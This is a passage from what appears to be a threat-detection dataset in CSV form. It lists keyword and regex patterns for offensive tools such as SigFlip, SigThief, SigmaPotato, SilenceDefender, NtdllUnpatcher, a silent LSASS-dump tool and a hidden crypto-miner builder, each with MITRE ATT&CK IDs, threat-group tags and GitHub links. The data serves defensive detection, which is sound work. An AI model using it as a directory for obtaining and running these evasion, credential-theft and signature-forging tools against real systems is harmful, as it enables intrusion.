sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59440" "*SigFlip.exe -*",".{0,1000}SigFlip\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59441" "*SigFlip.WinTrustData*",".{0,1000}SigFlip\.WinTrustData.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59442" "*SigInject *",".{0,1000}SigInject\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59443" "*SigInject *.dll*",".{0,1000}SigInject\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59444" "*SigLoader *",".{0,1000}SigLoader\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59445" "*Sigloader *.dll*",".{0,1000}Sigloader\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59446" "*SigLoader.*",".{0,1000}SigLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59447" "*SigLoader/sigloader.c*",".{0,1000}SigLoader\/sigloader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59448" "*SigmaPotato.exe*",".{0,1000}SigmaPotato\.exe.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","59449" 
"*SigmaPotatoCore.exe*",".{0,1000}SigmaPotatoCore\.exe.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","59450" "*signal2john.py*",".{0,1000}signal2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","59451" "*Signal-Labs/NtdllUnpatcher*",".{0,1000}Signal\-Labs\/NtdllUnpatcher.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","59452" "*SignToolEx.exe*",".{0,1000}SignToolEx\.exe.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59454" "*SignToolExHook.dll*",".{0,1000}SignToolExHook\.dll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59455" "*SignToolEx-main*",".{0,1000}SignToolEx\-main.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired 
certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","59456" "*SigPloit*",".{0,1000}SigPloit.{0,1000}","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and researchers to pentest and exploit vulnerabilities in the signaling protocols used in mobile operators regardless of the generation being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Reconnaissance","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","N/A","2","164","56","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z","59457" "*sigthief.exe.manifest*",".{0,1000}sigthief\.exe\.manifest.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","59458" "*SigThief.py*",".{0,1000}SigThief\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","59459" "*Sigthief.py*",".{0,1000}Sigthief\.py.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59460" "*sigthief.py*",".{0,1000}sigthief\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","59461" 
"*SigThief-master*",".{0,1000}SigThief\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","59462" "*sigwhatever.exe*",".{0,1000}sigwhatever\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - 
APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","59463" "*'Sil'+'ent'+'l'+'yContinu'+'e'*",".{0,1000}\'Sil\'\+\'ent\'\+\'l\'\+\'yContinu\'\+\'e\'.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","59464" "*SilenceDefender.ps1*",".{0,1000}SilenceDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59465" "*SilenceDefender_ATP.log*",".{0,1000}SilenceDefender_ATP\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","#logfile","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59466" "*SilenceDefender_ATP.ps1*",".{0,1000}SilenceDefender_ATP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59467" "*Silent Crypto Miner Builder*",".{0,1000}Silent\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","59468" "*Silent Lsass Dump*",".{0,1000}Silent\sLsass\sDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","59469" "*Silent.Crypto.Miner.Builder.zip*",".{0,1000}Silent\.Crypto\.Miner\.Builder\.zip.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","59470" "*silentbreaksec/Throwback*",".{0,1000}silentbreaksec\/Throwback.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","59471" "*SilentCleanupWinDirBOF*",".{0,1000}SilentCleanupWinDirBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege 
